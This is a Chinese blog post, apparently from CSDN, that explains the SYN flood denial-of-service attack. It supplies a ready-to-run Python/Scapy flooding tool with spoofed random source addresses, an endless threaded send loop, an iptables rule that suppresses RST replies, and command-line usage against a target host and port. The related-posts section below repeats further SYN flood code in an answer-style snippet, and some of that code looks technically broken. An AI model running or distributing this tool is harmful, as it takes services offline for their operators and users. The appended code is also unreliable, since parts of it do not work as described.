Python 实现SynFlood洪水攻击

已于 2023-06-27 22:00:04 修改
阅读量8.7k 收藏 22
点赞数 1
分类专栏: 《Python 编程技术实践》 文章标签: python 黑客编程 信息安全 SynFlood 拒绝服务
于 2022-10-07 09:49:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyshark_csdn/article/details/127191115
版权

Syn-Flood攻击属于TCP攻击,Flood类攻击中最常见,危害最大的是Syn-Flood攻击,也是历史最悠久的攻击之一,该攻击属于半开放攻击,攻击实现原理就是通过发送大量半连接状态的数据包,从而耗尽目标系统的连接池,默认情况下每一种系统的并发连接都是有限制的,如果恶意攻击持续进行,将会耗尽系统有限的连接池资源。windows 系统半开连接数是10个。

攻击者伪造地址对服务器发起SYN请求,服务器就会回应 SYN+ACK 此时攻击者的主机拒绝发送 RST+ACK 那么,服务器接收不到RST请求,就会认为客户端还没有准备好,会重试3-5次并且等待一个SYN Time(一般30秒-2分钟)后,丢弃这个连接。

虽然有丢弃的环节,但是如果攻击者的攻击速度大于目标主机的丢包速度的话,就会发生拒绝服务,因为TCP连接池一旦被填满,那么真正的连接无法建立,无法响应正常请求。

可以使用scapy工具进行验证,发送一个正常数据包,代码如下,发生攻击后再服务器上通过使用 netstat -n | awk '/^tcp/ {++S[$NF]} END{for(a in S) print a,S[a]}' 匹配所有半开放链接,你可以看都非常多等待状态的连接得不到相应。

ip = IP()
ip.dst="192.168.1.10"
tcp=TCP()
sr1(ip/tcp,verbose=1,timeout=3)
sr1(IP(dst="192.168.1.10")/TCP())

攻击代码如下,注意该攻击代码只能在Linux系统下使用,且要配置好IPtables转发规则。

#coding=utf-8
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被害IP -j DROP
import argparse
import socket,sys,random,threading
from scapy.all import *

scapy.config.conf.iface = 'ens32'

# 攻击目标主机TCP/IP半开放连接数,windows系统半开连接数是10个
def synflood(target,dstport):
    semaphore.acquire()       # 加锁
    issrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))
    isport = random.randint(1,65535)
    ip = IP(src = issrc,dst = target)
    syn = TCP(sport = isport, dport = dstport, flags = 'S')
    send(ip / syn, verbose = 0)
    print("[+] sendp --> {} {}".format(target,isport))
    semaphore.release()       # 释放锁

def Banner():
    print("  _          ____  _                _    ")
    print(" | |   _   _/ ___|| |__   __ _ _ __| | __")
    print(" | |  | | | \___ \| '_ \ / _` | '__| |/ /")
    print(" | |__| |_| |___) | | | | (_| | |  |   < ")
    print(" |_____\__, |____/|_| |_|\__,_|_|  |_|\_\\")
    print("       |___/                             \n")
    print("E-Mail: me@lyshark.com\n")

if __name__ == "__main__":
    Banner()
    parser = argparse.ArgumentParser()
    parser.add_argument("-H","--host",dest="host",type=str,help="输入被攻击主机IP地址")
    parser.add_argument("-p","--port",dest="port",type=int,help="输入被攻击主机端口")
    parser.add_argument("--type",dest="types",type=str,help="指定攻击的载荷 (synflood/sockstress)")
    parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻击并发线程数")
    args = parser.parse_args()
    if args.types == "synflood" and args.host and args.port and args.thread:
        semaphore = threading.Semaphore(args.thread)
        while True:
            t = threading.Thread(target=synflood,args=(args.host,args.port))
            t.start()
    else:
        parser.print_help()

使用方法如下:

  • main.py --type=synflood -H 192.168.1.1 -p 80 -t 10

案例中所表达的含义是,对主机192.168.1.1的80口,启用10个线程进行攻击。

微软技术分享
关注
专栏目录
python实现SynFlood 洪水流量攻击(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-28 559
python实现SynFlood 洪水流量攻击(附完整源码)
python scapy库实现泛洪(flood)攻击
2301_80419020的博客
07-09 285
python scapy泛洪攻击
使用Python实现SYN 泛洪攻击SYN Flood
橘子女侠
09-29 1万+
SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的Tcp连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。 SYN攻击是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文,由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,如果超过一定的时间没有接收到客户端的报文,那么本次连接在协议栈中存储的数据就会被丢...
Scapy库实现SYN洪水攻击Python脚本
瞉韩
07-08 616
简单的SYN洪水攻击功能。SYN洪水攻击是一种常见的拒绝服务(DoS)攻击手段,攻击者会发送大量的虚假TCP SYN数据包,占用目标服务器的资源,使其无法响应正常的连接请求。
Python实现SYNFlood,学习笔记
我的学习笔记
02-28 3600
Python2还是3我给忘记了,大家自己试试吧。#!/usr/bin/python #-*-coding:utf-8-*- import socket import struct import random import threading class myThread (threading.Thread): def __init__(...
Python实现SYN Flood攻击
WHACKW的专栏
11-24 6497
0×00 背景 SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 0×01 Code 本文章的目是介绍使用python构造packet的方法。 使用raw socket来发送packets。 该程序只适用于Li
python synflood test
热门推荐
神棍之路
11-14 7万+
#!/usr/bin/env python ######################################### # # SYNflood - A multithreaded SYN Flooder # author: arthurnn # # ######################################### import socket, random, sys,
syn flood攻击_Python编写exp实现 SYN Flood攻击
weixin_34708196的博客
01-06 441
1 SYN Flood介绍SYN-Flood攻击是当前网络上最为常见的DDoS(分布式拒绝服务)攻击,也是最为经典的拒绝服务攻击,它利用了TCP协议实现上的一个缺陷,通过向网络服务所在端口发送大量的伪造源地址的攻击报文,就可能造成目标服务器中的半开连接队列被占满,从而阻止其他合法用户进行访问。这种攻击早在1996年就被发现,但至今仍然显示出强大的生命力。很多操作系统,甚至防火墙、路由器都无法有效地...
Python项目 基于Scapy实现SYN泛洪攻击的方法
09-19
**Python项目:基于Scapy实现SYN泛洪攻击** SYN泛洪攻击是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,它利用TCP三次握手过程中的漏洞,通过发送大量伪造的SYN请求来消耗目标服务器的资源,使其无法...
python syn攻击
03-14
python语言实现 syn flood攻击
SYN flood C源代码
01-25
SYN flood是属于DOS攻击的一种典型方式,其发生方式就出现在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒 -2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,并处于崩溃状态,这种情况我们称之为:服务器端受到了SYN Flood攻击SYN洪泛)。
syn 攻击脚本 python_Python Scapy实现SYN Flood攻击
weixin_35266799的博客
01-30 1348
SYN Floodpython实现代码如下。需要事先安装scapy库。(是scapy 不是scrapy)from scapy.all import *import randomfrom scapy.layers.inet import TCP, IPimport socket,threadingdst=""dport=0class flood_SYN(threading.Thread):glob...
python实现SYN Flooding攻击
weixin_42037232的博客
04-22 3392
作业里的代码,直接这里copy在这里记录一下。     在TCP/IP协议中,当客户端试着与服务器间创建TCP连接时,正常情况下客户端与服务器端进行TCP三次握手: 1. 客户端通过发送SYN同步(synchronize)信息到服务器要求创建连接。 2. 服务器通过响应客户端SYN-ACK以抄收(acknowledge)请求。 3. 客户端答应ACK,连接随之建立。 当开放了一个TCP端...
Linux网络编程SYN洪水攻击
02-19 1603
1.概述 TCP建立连接需要3次握手,从IP层来看,客户端发送SYN请求,服务器对SYN响应,而客户端对服务器的响应再次确认才能建立连接。在服务器响应之后,等待一段时间,才能获得客户端的确认.从服务器接收到客户端的确认之前,服务器的资源一直占用。如果这时客户端不确认,那么这些连接就是半连接。通过建立大量的半连接,使服务器资源不断的减少,达到攻击的目的。或者是发送大量的SYN请求,使服务器不能够及
syn 攻击脚本 python_Python实现SYN Flood攻击
weixin_39702559的博客
11-29 444
'''Syn flood program in python using raw sockets (Linux)Silver Moon (m00n.silv3r@gmail.com)'''# some importsimport socket, sysfrom struct import *# checksum functions needed for calculation checksumde...
[笔记]使用Python的scapy库实现SYN洪水攻击
qq_61690448的博客
12-22 2563
[笔记]实现SYN泛洪攻击
Pythonsyn flood攻击代码
weixin_33856370的博客
12-08 898
2019独角兽企业重金招聘Python工程师标准>>> ...
【工具】Windows|两款开源桌面窗口管理小工具Deskpins和WindowTop
最新发布
qq_46106285的博客
09-21 861
写这篇的初衷是怕自己忘了这两个工具的名字。
python实现syn flood攻击
06-28
### 回答1: Python实现SYN Flood攻击是利用Python编程语言实现SYN Flood攻击技术。SYN Flood攻击是一种网络攻击技术,它会造成网络资源的严重耗尽,进而导致目标主机无法正常工作。Python语言具有易学易用的特点,可以方便地实现SYN Flood攻击,但这种行为是违法的,请勿尝试。 ### 回答2: Syn flood攻击是一种常见的网络攻击方式,其实现方式比较简单,主要是通过向目标服务器发送大量的TCP连接请求,消耗服务器资源,导致服务器无法正常处理其他合法请求,从而使服务不可用。Python作为一种高级编程语言,在网络编程方面具有很大的优势,可以用Python编写简单的Syn flood攻击脚本。 在Python实现Syn flood攻击,通常需要使用socket模块。使用socket创建一个TCP连接,通过设置header信息和payload信息模拟发送连接请求。在Syn flood攻击中,需要注意的是不需要与服务器正常建立连接,因此需要设置一些特殊的标志位。具体实现步骤如下: 1. 导入所需的模块: ``` import socket import random import struct import sys import time ``` 2. 定义目标服务器IP和Port: ``` target_ip = '192.168.0.1' target_port = 80 ``` 3. 定义socket连接: ``` # 创建TCP socket连接 tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ``` 4. 设置socket超时时间: ``` tcp_socket.settimeout(1) ``` 5. 开始攻击: ``` while True: # 随机生成源IP和Port src_ip = '%d.%d.%d.%d' % (random.randint(1, 254),random.randint(1, 254),random.randint(1, 254),random.randint(1, 254)) src_port = random.randint(1000, 65535) # 组合header信息和payload信息 ip_header = struct.pack('!BBHHHBBH4s4s', 69, 0, 40, random.randint(1, 65535), 0, 64, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(target_ip)) tcp_header = struct.pack('!HHLLBBHHH', src_port, target_port, random.randint(1, 4294967295), 0, 2, 2, 16384, 0, 0) payload = 'Attack' # 组合发送信息 packet = ip_header + tcp_header + payload.encode() # 发送攻击信息 tcp_socket.sendto(packet, (target_ip, target_port)) # 控制发送速率 time.sleep(0.01) ``` 上述代码中,使用了循环控制发送攻击信息的频率,并通过随机生成源IP和Port以及组合特殊的header信息和payload信息来模拟Syn flood攻击。 需要注意的是,Syn flood攻击是一种非法的行为,会对目标服务器造成极大的损失,严重时甚至可能导致服务不可用。因此,在编写和使用此类脚本时,应当遵守相关的法律法规和道德规范,不得用于非法用途。 ### 回答3: 首先,Syn Flood攻击是一种DDoS攻击,通过发送大量的SYN请求给目标服务器,并不断地伪造源IP地址和端口号,来使服务器资源耗尽,从而导致服务器无法正常运行,甚至崩溃。在Python中,我们可以使用socket库来实现Syn Flood攻击。 1. 首先,我们需要创建一个Socket对象,使用IP协议进行通信,并设置为UDP协议。 ```python import socket target_ip = "127.0.0.1" # 目标IP地址 target_port = 80 # 目标端口号 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((target_ip, 0)) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) sock.setsockopt(socket.IPPROTO_IP, socket.IP_MTU_DISCOVER, socket.IP_PMTUDISC_DO) ``` 2. 接着,创建IP和TCP头文件,并设置TCP头文件中的SYN标志位为1,表示初次握手请求,并随机生成源IP地址和端口号。 ```python import random def generate_ip_header(source_ip, dest_ip): ip_header = struct.pack('!BBHHHBBH4s4s', 69, 0, 20, 3230, 0, 2, 0, 0, source_ip, dest_ip) return ip_header def generate_tcp_header(source_port, dest_port, sequence, syn_flag): tcp_header = struct.pack('!HHLLBBHHH', source_port, dest_port, sequence, 0, (5 << 4) + 0, syn_flag, 2048, 0, 0) return tcp_header while True: source_ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) source_port = random.randint(1024, 65535) dest_ip = socket.inet_aton(target_ip) dest_port = target_port sequence = random.randint(0, 0xffffffff) syn_flag = 1 ip_header = generate_ip_header(source_ip, dest_ip) tcp_header = generate_tcp_header(source_port, dest_port, sequence, syn_flag) packet = ip_header + tcp_header sock.sendto(packet, (target_ip, target_port)) ``` 3. 最后,我们可以通过不断地发送SYN请求包,来实现Syn Flood攻击。 需要注意的是,由于我们使用的是UDP协议,所以在发送SYN请求包时,需要设置IP数据报头的长度为20字节,并把TCP头文件插入到其中。 总体来说,Python实现Syn Flood攻击的代码并不复杂,但是这种攻击行为是违法的,可能会造成严重的后果。因此,我们应该遵守法律规定,不要尝试进行此类攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微软技术分享

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值